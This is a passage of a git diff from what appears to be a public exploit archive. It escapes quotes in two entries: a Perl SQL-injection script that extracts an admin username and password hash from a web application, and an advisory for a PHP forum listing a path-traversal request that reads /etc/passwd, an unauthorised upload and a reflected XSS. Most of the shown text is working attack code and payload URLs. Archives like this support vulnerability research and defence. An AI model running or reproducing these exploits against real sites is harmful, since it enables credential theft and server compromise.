#----------------------------------------------------------------------------# ######################################## -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); +$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\"; +$b->agent(\'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\'); ######################################## #----------------------------------------------------------------------------# ######################################## -$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*"; +$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~ /::(.*?)::::/){ - print "\nBrought to you by v4-team.com...\n"; - print "\n[+] Admin User : $1"; + print \"\\nBrought to you by v4-team.com...\\n\"; + print \"\\n[+] Admin User : $1\"; } ######################################## #----------------------------------------------------------------------------# ######################################## -if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n"; -print "\t\t# Exploit has ben aported user and password hash #\n\n";} -else{print "\n[-] Exploit Failed...\n";} +if ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\"; +print \"\\t\\t# Exploit has ben aported user and password hash #\\n\\n\";} +else{print \"\\n[-] Exploit Failed...\\n\";} ######################################## #-------------------Exploit exploited by Stack --------------------# ######################################## diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt index 2d11ad8d0..5e8fbcd2d 100755 --- a/platforms/php/webapps/5870.txt +++ b/platforms/php/webapps/5870.txt @@ -18,13 +18,13 @@ #################### 2. Vulnerabilities: #################### - 2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. + 2.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter. 2.1.1. Exploit: Check the exploit/POC section. 2.2. File (image) Upload without premission. 2.2.1. Exploit: Check the exploit/POC section. - 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". + 2.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\". 2.3.1. Exploit: Check the exploit/POC section. @@ -32,7 +32,7 @@ 3. Exploits/POCs: #################### Original Exploit URL: http://bugreport.ir/index.php?/46/exploit - 3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. + 3.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter. ------------- LFI: http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd @@ -42,15 +42,15 @@ Uploader link: http://[URL]/[Forum Path]/upload.php ------------- - 3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". + 3.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\". ------------- -
+
XSS:

-
 search only in topics
 search in topics and answers

+
 search only in topics
 search in topics and answers